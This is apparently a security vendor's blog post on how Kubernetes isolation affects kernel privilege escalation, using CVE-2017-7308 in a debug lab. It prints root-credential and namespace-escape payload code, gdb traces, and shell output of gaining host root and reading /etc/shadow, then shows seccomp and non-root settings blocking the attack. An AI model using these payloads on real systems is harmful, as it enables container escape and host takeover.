Skip to main content

Kernel privilege escalation: how Kubernetes container isolation impacts privilege escalation attacks

Written by
Headshot of Kamil Potrec

Kamil Potrec

December 3, 2020

0 mins read

During the day, I spend my time analyzing Terraform code, Kubernetes object configuration files, and identifying common security issues. When the sun sets, I put on my hoodie, fire up Linux VMs and debuggers to look under the hood of technologies that make up the cloud native ecosystem.

In this post, we will explore how Kubernetes container isolation impacts privilege escalation attacks. We will use common kernel exploitation techniques to figure out how container abstractions layers can hinder our path to that precious root shell.

What is privilege escalation?

Privilege escalation is a term used to describe the process of obtaining more permissions to a resource. Kernel privilege escalation is a process of obtaining these permissions by exploiting a weakness in one of many kernel entry points, also referred to as attack vectors. An attack vector is simply a path which provides access to the vulnerable code.

We interact with the kernel in many ways, by reading from the file system, opening a device file,  issuing system calls, or sending a packet over the network interface. All of these actions require some sort of process to happen in the kernel space. When the kernel performs an action on behalf of the user process, we say that the kernel operates in a process context. Each process is represented in the kernel via a struct task_struct structure. These are stored in a circular doubly linked list, and accessed from PER_CPU variables on x86-64 architecture when a context switch happens from user space to kernel space.

A task_struct contains a struct creds member which holds the user identifier and capabilities associated with the process. This information is used by the kernel to determine if an action can be performed by the process, for example, if it is allowed to execute a specific syscall. The generic goal of the kernel privilege escalation process is to replace or update the credentials structure to gain more permissions.

How does privilege escalation work?

The most common technique to obtain elevated permissions in kernel space is to utilize the combination of kernel functions [commit_creds](https://github.com/torvalds/linux/blob/master/kernel/cred.c#L437)([prepare_kernel_cred(0)](https://github.com/torvalds/linux/blob/master/kernel/cred.c#L682)). This can only be achieved once an exploit obtained control over an instruction pointer (RIP), and successfully defeated memory access and randomization controls. [prepare_kernel_cred](https://github.com/torvalds/linux/blob/master/kernel/cred.c#L682)can generate the credentials object based on an existing one, or more generously generate a default one with full root permissions. [commit_creds](https://github.com/torvalds/linux/blob/master/kernel/cred.c#L437) simply updates the task_struct of the current process with the new credential object.

1typedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
2typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
3
4void get_root_payload(void) {
5   ((_commit_creds)(KERNEL_BASE + COMMIT_CREDS))(
6       ((_prepare_kernel_cred)(KERNEL_BASE + PREPARE_KERNEL_CRED))(0)
7   );
8}

Kernel exploitation is a very large field, and so for this blog post, we will just explore an oversimplified version of kernel privilege escalation. There are numerous security controls in the kernel which are designed to make exploitation harder. SMEP, SMAP, KASLR, and KPTI are all mechanisms which are implemented in hardware or in the kernel and are turned on or off by the distribution you are using, or by a system administrator. There is no direct way to control these settings from Kubernetes and these are, therefore, out of scope for this post.

We will be using an old issue in the af_packet implementation that received CVE-2017-7308. The vulnerability is exploitable with the CAP_NET_RAW capability, as it requires access to raw sockets. Details of the vulnerability are exhaustively explained here, so we won’t go into that. We can obtain all the capabilities we need in an unprivileged user namespace. On the Ubuntu distribution, access to user namespaces is not restricted by default.

1dev@node1:~/exploit$ grep CONFIG_USER_NS /boot/config-4.15.0-122-generic
2CONFIG_USER_NS=y
3dev@node1:~/exploit$ sudo sysctl kernel.unprivileged_userns_clone
4kernel.unprivileged_userns_clone = 1
5dev@node1:~/exploit$

Let’s dig in

First off, let's look at the end-to-end process in a non-containerized environment first.

We need to connect GNU Debugger (gdb) to the Virtual Machine stub. Once the debugger is attached, we can set a breakpoint at a convenient location. In this case, we are using an mlock system call, which we can manually trigger from the exploit whenever we want to look at the internal state of the running process. Note that the gdb will only break if the executing process name is called “exploit”. This minimizes the risk of the breakpoint being triggered by some other process on the system. The setup tasks are conveniently scripted in a .gdb command file. We execute GDB with the -x flag to perform the setup in a consistent and repeatable way.

1dev@pwnbox:/$ cat setup.gdb
2set print pretty on
3file vmlinux
4target remote 127.0.0.1:11234
5break sys_mlock if $_streq($lx_current().comm, "exploit")
6continue
7dev@pwnbox:/$ gdb -q -x setup.gdb
80xffffffff819c24be in native_safe_halt () at ./arch/x86/include/asm/irqflags.h:61
961  }
10Breakpoint 1 at 0xffffffff8121da50: file mm/mlock.c, line 709.

Breakpoints will be triggered before the unprivileged user namespace is created, just before we execute the vulnerability, and after we obtained root credentials. We implement this behavior by simply executing the correct syscall.

1syscall(149, 0, 0); // Break before CLONE_NEWUSER
2if (unshare(CLONE_NEWUSER) != 0) {
3   perror("[-] unshare(CLONE_NEWUSER)");
4   exit(EXIT_FAILURE);
5}
6/* OMITTED */printf("[*] executing get root payload %p\n", &get_root_payload);
7syscall(149, 0, 0); // Break before commit_creds
8exploit_cve_2017_7308((void *)&get_root_payload);
9printf("[*] done\n");
10syscall(149, 0, 0); // Break after commit_creds

Now we can execute the exploit:

1dev@node1:~/exploit$ ./exploit
2[*] CVE-2017-7308 based on https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
3[*] commit_creds:        ffffffff810b45e0
4[*] prepare_kernel_cred: ffffffff810b4ad0
5[*] executing get root payload 0x558abc4dd583

Our first breakpoint is triggered as expected. We can examine the cred structure by running gdb helper function $lx_current. The effective UID of the current process is 1000, and it has no effective capabilities in the current namespace as expected.

1Thread 6 hit Breakpoint 1, SyS_mlock (start=0, len=0) at mm/mlock.c:709
2709 SYSCALL_DEFINE2(mlock, unsigned long, start, size_t, len)
3(gdb) p *($lx_current().cred)
4$1 = {
5 usage = {counter = 4},
6 uid = { val = 1000 },
7 gid = { val = 1000 },
8 suid = { val = 1000 },
9 sgid = { val = 1000 },
10 euid = { val = 1000 },
11 egid = { val = 1000 },
12 fsuid = { val = 1000 },
13 fsgid = { val = 1000 },
14 securebits = 0,
15 cap_inheritable = { cap = {0, 0} },
16 cap_permitted = { cap = {0, 0} },
17 cap_effective = { cap = {0, 0} },
18 cap_bset = { cap = {4294967295, 63} },
19 cap_ambient = { cap = {0, 0} },
20 jit_keyring = 0 '\000',
21 session_keyring = 0xffff888331051f00,
22 process_keyring = 0x0 <irq_stack_union>,
23 thread_keyring = 0x0 <irq_stack_union>,
24 request_key_auth = 0x0 <irq_stack_union>,
25 security = 0xffff8882bb29dd60,
26 user = 0xffff88832dd89f00,
27 user_ns = 0xffffffff824541e0 <init_user_ns>,
28 group_info = 0xffff8882b9181480,
29 {
30   non_rcu = 0,
31   rcu = {
32     next = 0x0 <irq_stack_union>,
33     func = 0x0 <irq_stack_union>
34   }
35 }
36}
37(gdb)

The second breakpoint is triggered after a call to unshare, and the new user namespace is created for the process. Observe how the UID remains unchanged, but cap_effective and user_ns attributes have changed. Capabilities are stored as a bitmask, which is more readable in hex format.

1Thread 1 hit Breakpoint 1, SyS_mlock (start=0, len=0) at mm/mlock.c:709
2709 SYSCALL_DEFINE2(mlock, unsigned long, start, size_t, len)
3(gdb) p *($lx_current().cred)
4$2 = {
5 /* OMITTED */ uid = { val = 1000 },
6 gid = { val = 1000 },
7 /* OMITTED */ euid = { val = 1000 },
8 /* OMITTED */ cap_inheritable = { cap = {0, 0} },
9 cap_permitted = { cap = {4294967295, 63} },
10 cap_effective = { cap = {4294967295, 63} },
11 /* OMITTED */ user = 0xffff88832dd89f00,
12 user_ns = 0xffff8882c1e0b800,
13 /* OMITTED */}
14(gdb) p/x 4294967295
15$4 = 0xffffffff 
16(gdb)

Our last breakpoint is triggered after the vulnerability is exploited. Observe that UID is now set to 0, and user namespace is reset to init_user_ns which represents the host’s init user namespace.

1Thread 1 hit Breakpoint 1, SyS_mlock (start=0, len=0) at mm/mlock.c:709
2709 SYSCALL_DEFINE2(mlock, unsigned long, start, size_t, len)
3(gdb) p *($lx_current().cred)
4$3 = {
5 /* OMITTED */ uid = { val = 0 },
6 /* OMITTED */ 
7 euid = { val = 0 },
8 /* OMITTED */ cap_effective = { cap = {4294967295, 63} },
9 /* OMITTED */ user = 0xffffffff82454160 <root_user>,
10 user_ns = 0xffffffff824541e0 <init_user_ns>,
11 group_info = 0xffffffff8245b568 <init_groups>,
12 /* OMITTED */ }

Our shell returns and we now have full root permissions on the host.

1dev@node1:~/exploit$ ./exploit
2[*] CVE-2017-7308 based on https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
3[*] commit_creds:        ffffffff810b45e0
4[*] prepare_kernel_cred: ffffffff810b4ad0
5[*] executing get root payload 0x558abc4dd583
6[*] done
7[+] got r00t
8root@node1:/home/dev/exploit# id
9uid=0(root) gid=0(root) groups=0(root)
10root@node1:/home/dev/exploit#

Kernel exploit in a container

Next, we will try to execute the very same exploit inside a pod. We have created a very simple pod object definition and deployed it into the cluster.

1apiVersion: v1
2kind: Pod
3metadata:
4 name: very-default-pod
5spec:
6 containers:
7   - name: test
8     image: digitalocean/doks-debug:latest
9     command: [ "sleep", "infinity" ]

Lets see what happens in the default configuration.

1dev@pwnbox:/$ kubectl get nodes
2NAME    STATUS   ROLES    AGE   VERSION
3node1   Ready    master   8d    v1.18.10
4dev@pwnbox:/$ kubectl get pods
5No resources found in default namespace.
6dev@pwnbox:/$ kubectl apply -f very-default-pod.yaml
7pod/test created
8dev@pwnbox:/$ kubectl get pods
9NAME   READY   STATUS    RESTARTS   AGE
10test   1/1     Running   0          4s
11dev@pwnbox:/$ kubectl exec -it test -- /bin/bash
12root@test:~# id
13uid=0(root) gid=0(root) groups=0(root)

Root by default

The image that we used in the demo does not specify an unprivileged user, and by default, Kubernetes will not enforce the UID. So, it appears that we had root access without needing to exploit the kernel. We are re-running the very same exploit, and break the kernel just before it executes the vulnerable path. If you look at the effective capabilities of the process, it’s clear that some are missing. The value is set to 2818844155, which represents the default capability set granted by Docker runtime.

1(gdb) p *($lx_current().cred)
2$1 = {
3 /* OMITTED */ euid = { val = 0 },
4 /* OMITTED */ securebits = 0,
5 cap_inheritable = { cap = {2818844155, 0} },
6 cap_permitted = { cap = {2818844155, 0} },
7 cap_effective = { cap = {2818844155, 0} },
8 cap_bset = { cap = {2818844155, 0} },
9 cap_ambient = { cap = {0, 0} },
10 /* OMITTED */ 
11 user = 0xffffffff82454160 <root_user>,
12 user_ns = 0xffffffff824541e0 <init_user_ns>,
13 /* OMITTED */ }

After the exploit completes, the effective set once again includes all of the capabilities.

1Thread 1 hit Breakpoint 1, SyS_mlock (start=0, len=0) at mm/mlock.c:709
2709 SYSCALL_DEFINE2(mlock, unsigned long, start, size_t, len)
3(gdb) p *($lx_current().cred)
4$2 = {
5 /* OMITTED */ securebits = 0,
6 cap_inheritable = { cap = {0, 0} },
7 cap_permitted = { cap = {4294967295, 63} },
8 cap_effective = { cap = {4294967295, 63} },
9 cap_bset = { cap = {4294967295, 63} },
10 /* OMITTED */}

This time we will enforce non-root user id on the container, by setting runAs security context attributes.

1apiVersion: v1
2kind: Pod
3metadata:
4 name: non-root-pod
5spec:
6 containers:
7   - name: test
8     image: digitalocean/doks-debug:latest
9     securityContext:
10       runAsUser: 1000
11       runAsGroup: 1000
12     command: [ "sleep", "infinity" ]

This time we don’t have the root permissions out of the box. The exploit, however, performs identically with one major difference in the final result. It appears that we have all the permissions but we don’t see everything on the system.

1dev@pwnbox:/$ kubectl apply -f non-root-uid-pod.yaml
2pod/test created
3dev@pwnbox:/$ kubectl exec -it test -- /bin/bash
4groups: cannot find name for group ID 1000
5I have no name!@test:/root$ cd /mnt/dev/exploit/
6I have no name!@test:/mnt/dev/exploit$ ./exploit
7[*] CVE-2017-7308 based on https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
8[*] commit_creds:        ffffffff810b45e0
9[*] prepare_kernel_cred: ffffffff810b4ad0
10[*] executing get root payload 0x55e55ff5a583
11[*] done
12[+] got r00t
13root@test:/mnt/dev/exploit# id
14uid=0(root) gid=0(root) groups=0(root)
15root@test:/mnt/dev/exploit# cat /etc/shadow
16root:*:18198:0:99999:7:::
17daemon:*:18198:0:99999:7:::
18bin:*:18198:0:99999:7:::
19sys:*:18198:0:99999:7:::
20sync:*:18198:0:99999:7:::
21games:*:18198:0:99999:7:::
22man:*:18198:0:99999:7:::
23lp:*:18198:0:99999:7:::
24mail:*:18198:0:99999:7:::
25news:*:18198:0:99999:7:::
26uucp:*:18198:0:99999:7:::
27proxy:*:18198:0:99999:7:::
28www-data:*:18198:0:99999:7:::
29backup:*:18198:0:99999:7:::
30list:*:18198:0:99999:7:::
31irc:*:18198:0:99999:7:::
32gnats:*:18198:0:99999:7:::
33nobody:*:18198:0:99999:7:::
34_apt:*:18198:0:99999:7:::
35messagebus:*:18207:0:99999:7:::
36root@test:/mnt/dev/exploit# ip addr
371: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
38   link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
39   inet 127.0.0.1/8 scope host lo
40      valid_lft forever preferred_lft forever
41   inet6 ::1/128 scope host
42      valid_lft forever preferred_lft forever
432: tunl0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN group default qlen 1000
44   link/ipip 0.0.0.0 brd 0.0.0.0
45root@test:/mnt/dev/exploit#

Namespace cage

We managed to get all the capabilities and root UID, but only bypassed the capabilities barrier of the container—we still don’t have access to the host's filesystem, so we cannot see all the processes or even communicate over the host’s network interfaces.

1root@test:~# ls -la /dev/
2total 4
3drwxr-xr-x 5 root root  360 Nov 23 14:04 .
4drwxr-xr-x 1 root root 4096 Nov 23 14:04 ..
5lrwxrwxrwx 1 root root   11 Nov 23 14:04 core -> /proc/kcore
6lrwxrwxrwx 1 root root   13 Nov 23 14:04 fd -> /proc/self/fd
7crw-rw-rw- 1 root root 1, 7 Nov 23 14:04 full
8drwxrwxrwt 2 root root   40 Nov 23 14:04 mqueue
9crw-rw-rw- 1 root root 1, 3 Nov 23 14:04 null
10lrwxrwxrwx 1 root root    8 Nov 23 14:04 ptmx -> pts/ptmx
11drwxr-xr-x 2 root root    0 Nov 23 14:04 pts
12crw-rw-rw- 1 root root 1, 8 Nov 23 14:04 random
13drwxrwxrwt 2 root root   40 Nov 23 14:04 shm
14lrwxrwxrwx 1 root root   15 Nov 23 14:04 stderr -> /proc/self/fd/2
15lrwxrwxrwx 1 root root   15 Nov 23 14:04 stdin -> /proc/self/fd/0
16lrwxrwxrwx 1 root root   15 Nov 23 14:04 stdout -> /proc/self/fd/1
17-rw-rw-rw- 1 root root    0 Nov 23 14:04 termination-log
18crw-rw-rw- 1 root root 5, 0 Nov 23 14:04 tty
19crw-rw-rw- 1 root root 1, 9 Nov 23 14:04 urandom
20crw-rw-rw- 1 root root 1, 5 Nov 23 14:04 zero
21root@test:~# ps aux
22USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
23root         1  0.0  0.0   4532   752 ?        Ss   14:04   0:00 sleep infinity
24root         7  0.0  0.0  18504  3352 pts/0    Ss   14:04   0:00 /bin/bash
25root        24  0.0  0.0  34400  2776 pts/0    R+   14:04   0:00 ps aux
26root@test:~# ip addr
271: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
28   link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
29   inet 127.0.0.1/8 scope host lo
30      valid_lft forever preferred_lft forever
312: tunl0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN group default qlen 1000
32   link/ipip 0.0.0.0 brd 0.0.0.0
334: eth0@if14: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
34   link/ether 4e:52:2c:19:28:37 brd ff:ff:ff:ff:ff:ff link-netnsid 0
35   inet 10.233.90.139/32 scope global eth0
36      valid_lft forever preferred_lft forever
37root@test:~#

At this point, we can load any kernel modules we like but that is noisy and will trigger most basic intrusion detection systems (one would hope). To test this we will remove an unused module. Note your docker image needs to have module packages installed. In the case of Debian images, you will need to install the kmod package.

1root@test:/mnt/dev/exploit# lsmod
2Module                  Size  Used by
3i2c_piix4              24576  0
4binfmt_misc            20480  1
5xt_CT                  16384  8
6xt_tcpudp              16384  12
7/* OMITTED */pata_acpi              16384  0
8floppy                 77824  0
9root@test:/mnt/dev/exploit# rmmod i2c_piix4
10root@test:/mnt/dev/exploit# lsmod | grep i2c
11root@test:/mnt/dev/exploit#

Instead, we can extend our kernel exploit and set the [struct nsproxy](https://github.com/torvalds/linux/blob/master/include/linux/nsproxy.h#L31) object in the current context to point to namespaces we like. Namespaces are identified by inodes, but the kernel exports the address of [init_nsproxy](https://github.com/torvalds/linux/blob/master/kernel/nsproxy.c#L32) which we can use to copy host’s init namespaces to our container.

1(gdb) info address init_nsproxy
2Symbol "init_nsproxy" is static storage at address 0xffffffff8245b2a0.
3(gdb
4

The sys_setns syscall can be used to update namespaces for the process context. There are three primary namespaces we want to PrivEsc into: PID, Network, and Mount. First of all, we need to obtain the reference to root namespaces, we can do that by moving container PID 1 into the host’s namespaces. Then we can get references to any namespaces from the /proc/ file system of PID 1. Finally, move the current process into the required namespaces.

1typedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
2typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
3typedef unsigned long long __attribute__((regparm(3))) (* _find_task_by_vpid)(unsigned int vnr);
4typedef void __attribute__((regparm(3))) (* _switch_task_namespaces)(void *tsk, void *new);
5typedef long __attribute__((regparm(4))) (* _do_sys_open)(int fd, const char *filename, int flags, unsigned short mode);
6typedef long __attribute__((regparm(3))) (* _sys_setns)(int fd, int nstype);
7
8void get_root_payload(void) {
9   ((_commit_creds)(KERNEL_BASE + COMMIT_CREDS))(
10       ((_prepare_kernel_cred)(KERNEL_BASE + PREPARE_KERNEL_CRED))(0)
11   );
12   // [1] - Identify PID 1 task in current PID namespace
13   unsigned long long task = ((_find_task_by_vpid)(KERNEL_BASE + FIND_TASK_BY_VPID))(1);
14   // [2] - Move PID 1 into init namespaces
15   ((_switch_task_namespaces)(KERNEL_BASE + SWITCH_TASK_NS))((void *)task, (void *)(KERNEL_BASE + INIT_NSPROXY));
16   // [3] - Read mount namespace inode
17   long fd = ((_do_sys_open)(KERNEL_BASE + DO_SYS_OPEN))(AT_FDCWD, "/proc/1/ns/mnt", O_RDONLY, 0);
18   // [4] - Move current process into host’s mount namespace
19   ((_sys_setns)(KERNEL_BASE + SYS_SETNS))( fd, 0 );
20   // [5] - Read pid namespace inode
21   fd = ((_do_sys_open)(KERNEL_BASE + DO_SYS_OPEN))(AT_FDCWD, "/proc/1/ns/pid", O_RDONLY, 0);
22   // [6] - Move current process into host’s pid namespace
23   ((_sys_setns)(KERNEL_BASE + SYS_SETNS))( fd, 0 );
24   // [7] - Read network namespace inode
25   fd = ((_do_sys_open)(KERNEL_BASE + DO_SYS_OPEN))(AT_FDCWD, "/proc/1/ns/net", O_RDONLY, 0);
26   // [8] - Move current process into host’s network namespace
27   ((_sys_setns)(KERNEL_BASE + SYS_SETNS))( fd, 0 );
28}
29

After our exploit is executed, we can access all of the interesting system resources.

1I have no name!@test:/root$ cd /mnt/dev/exploit/
2I have no name!@test:/mnt/dev/exploit$ id
3uid=1000 gid=1000 groups=1000
4I have no name!@test:/mnt/dev/exploit$ ./exploit
5[*] CVE-2017-7308 based on https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
6[*] commit_creds:        ffffffff810b45e0
7[*] prepare_kernel_cred: ffffffff810b4ad0
8[*] executing get root payload 0x559f462d7583
9[*] done
10[+] got r00t
11root@test:/# id
12uid=0(root) gid=0(root) groups=0(root)root@test:/# ps aux
13USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
14root         1  0.2  0.0 226012  9556 ?        Ss   14:30   0:02 /sbin/init nokaslr nopti
15root         2  0.0  0.0      0     0 ?        S    14:30   0:00 [kthreadd]
16root         3  0.0  0.0      0     0 ?        I    14:30   0:00 [kworker/0:0]
17root         4  0.0  0.0      0     0 ?        I<   14:30   0:00 [kworker/0:0H]
18root         6  0.0  0.0      0     0 ?        I<   14:30   0:00 [mm_percpu_wq]
19/* OMITTED */dev      18468  0.0  0.0   4532   724 ?        Ss   14:44   0:00 sleep infinity
20dev      18642  0.0  0.0  18508  3360 pts/0    Ss   14:44   0:00 /bin/bash
21root     19762  0.2  0.0   4516   752 pts/0    S    14:45   0:00 ./exploit
22root     19767  0.0  0.0  18516  3412 pts/0    S    14:45   0:00 /bin/bash -i
23root     19803  0.0  0.0  36708  3172 pts/0    R+   14:45   0:00 ps aux
24root@test:/# ip addr
251: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
26    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
27    inet 127.0.0.1/8 scope host lo
28       valid_lft forever preferred_lft forever
29    inet6 ::1/128 scope host
30       valid_lft forever preferred_lft forever
312: ens3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
32   link/ether 52:54:00:8a:6e:73 brd ff:ff:ff:ff:ff:ff
33   inet 10.100.100.80/24 brd 10.100.100.255 scope global dynamic ens3
34      valid_lft 2704sec preferred_lft 2704sec
35   inet6 fe80::5054:ff:fe8a:6e73/64 scope link
36      valid_lft forever preferred_lft forever
373: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
38   link/ether 02:42:00:d6:f9:0a brd ff:ff:ff:ff:ff:ff
39   inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
40      valid_lft forever preferred_lft forever
414: kube-ipvs0: <BROADCAST,NOARP> mtu 1500 qdisc noop state DOWN group default
42   link/ether 76:17:6a:aa:ea:9e brd ff:ff:ff:ff:ff:ff
43   inet 10.233.59.218/32 brd 10.233.59.218 scope global kube-ipvs0
44      valid_lft forever preferred_lft forever
45   inet 10.233.0.1/32 brd 10.233.0.1 scope global kube-ipvs0
46      valid_lft forever preferred_lft forever
47   inet 10.233.0.3/32 brd 10.233.0.3 scope global kube-ipvs0
48      valid_lft forever preferred_lft forever
49   inet 10.233.17.50/32 brd 10.233.17.50 scope global kube-ipvs0
50      valid_lft forever preferred_lft forever
51/* OMITTED */14: cali1037a54e65e@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
52   link/ether ee:ee:ee:ee:ee:ee brd ff:ff:ff:ff:ff:ff link-netnsid 0
53   inet6 fe80::ecee:eeff:feee:eeee/64 scope link
54      valid_lft forever preferred_lft forever
55root@test:/#
56root@test:/# reboot
57Failed to connect to bus: No data available

Usability of capabilities

Default capabilities assigned to Kubernetes containers (with the Docker runtime) grants CAP_NET_RAW to the container. Does this mean we would be able to exploit the vulnerability even if unprivileged user namespaces are disabled? We added code to set effective capabilities required to reach vulnerable code.

1cap_t caps;
2caps = cap_get_proc();
3if (caps == NULL){
4   perror("[-] Failed to get current caps\n");
5   exit(EXIT_FAILURE);
6}
7cap_value_t cap_list[1];
8cap_list[0] = CAP_NET_RAW;
9if(cap_set_flag(caps, CAP_EFFECTIVE, 1, cap_list, CAP_SET) == -1){
10   perror("[-] Failed to set effective caps\n");
11   exit(EXIT_FAILURE);
12}
13if(cap_set_proc(caps) != 0){
14   perror("[-] Failed to set process cpas\n");
15   exit(EXIT_FAILURE);
16}

As you can see the exploit fails, but why?

1I have no name!@test:/root$ id
2uid=1000 gid=1000 groups=1000
3I have no name!@test:/root$ cd /mnt/dev/exploit/
4I have no name!@test:/mnt/dev/exploit$ ./exploit
5[*] CVE-2017-7308 based on https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
6[-] unshare(CLONE_NEWUSER): Operation not permitted
7I have no name!@test:/mnt/dev/exploit$

This has to do with inheritable capabilities and how they are implemented. Even though the container runtime has granted these capabilities to the processes in the container, these have to be explicitly set on as effective via sys_capset. At the moment, only processes with UID 0 can set effective capabilities. So, if you want to run as a non-root user, but still have access to some of the capabilities you need to include a suid binary in your container to set the effective capabilities. Alternatively, you can simply set required capabilities on the executable and drop the container capabilities. File capabilities are limited to file systems with extended attributes.

Seccomp to the rescue

Let’s now talk about attack vector reachability. Our exploit works because unprivileged users can obtain CAP_NET_RAW capability in unprivileged user namespaces. We saw how this impacts our exploit in the above discussion about capabilities. There is one more countermeasure we can use to stop this attack—and yes you can enable it via Kubernetes.

Seccomp is a mechanism which can be utilized to reduce the kernel's attack surface by filtering system calls. Unfortunately, by default, Kubernetes will not apply a seccomp profile to your container. This means that all system calls are allowed, subject to the already discussed permissions checks. We can change that by adding annotation to the object declaration (pre-v1.19), or by adding the seccomp profile attribute to the pod security context.

1apiVersion: v1
2kind: Pod
3metadata:
4 name: seccomp-pod
5 annotations:
6   seccomp.security.alpha.kubernetes.io/pod: runtime/default
7spec:
8 containers:
9   - name: test
10     image: digitalocean/doks-debug:latest
11     command: [ "sleep", "infinity" ]
12

Let's have a look at how the default profile provided by the container runtime (in this case Docker) affects our exploit. We are greeted with “Operation not permitted” error, because The default seccomp profile does not allow the unshare syscall.

1I have no name!@test:/root$ cd /mnt/dev/exploit/
2I have no name!@test:/mnt/dev/exploit$ sysctl kernel.unprivileged_userns_clone
3kernel.unprivileged_userns_clone = 1
4I have no name!@test:/mnt/dev/exploit$ ./exploit
5[*] CVE-2017-7308 based on https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
6[-] unshare(CLONE_NEWUSER): Operation not permitted
7I have no name!@test:/mnt/dev/exploit$

Seccomp is great in limiting unnecessary kernel entry points. System calls, such as unshare, or userfaultfd, can be safely disabled for most use cases and are great at stopping some exploitation techniques. But there are some calls that would be tricky to block, such as waitid. You can find these and more techniques to exploit containers here.

Conclusions

We managed to prevent this exploit with a default seccomp profile. As you can see, even though our operating system is vulnerable, the exploit path is unreachable from our container (on this occasion). This technique could give you enough breathing room to plan the very much needed update to the operating system! You should consider these measures as defense-in-depth controls and mitigation strategies.

Always patch your systems! Snyk Infrastructure as Code can help you catch these mitigation options early on in your CI/CD pipeline, way before anything is deployed in production. We use adversarial techniques to identify high impact security options in Kubernetes, and cloud service providers. Use Snyk for free by registering for a free account.

Get started in capture the flag

Learn how to solve capture the flag challenges by watching our virtual 101 workshop on demand.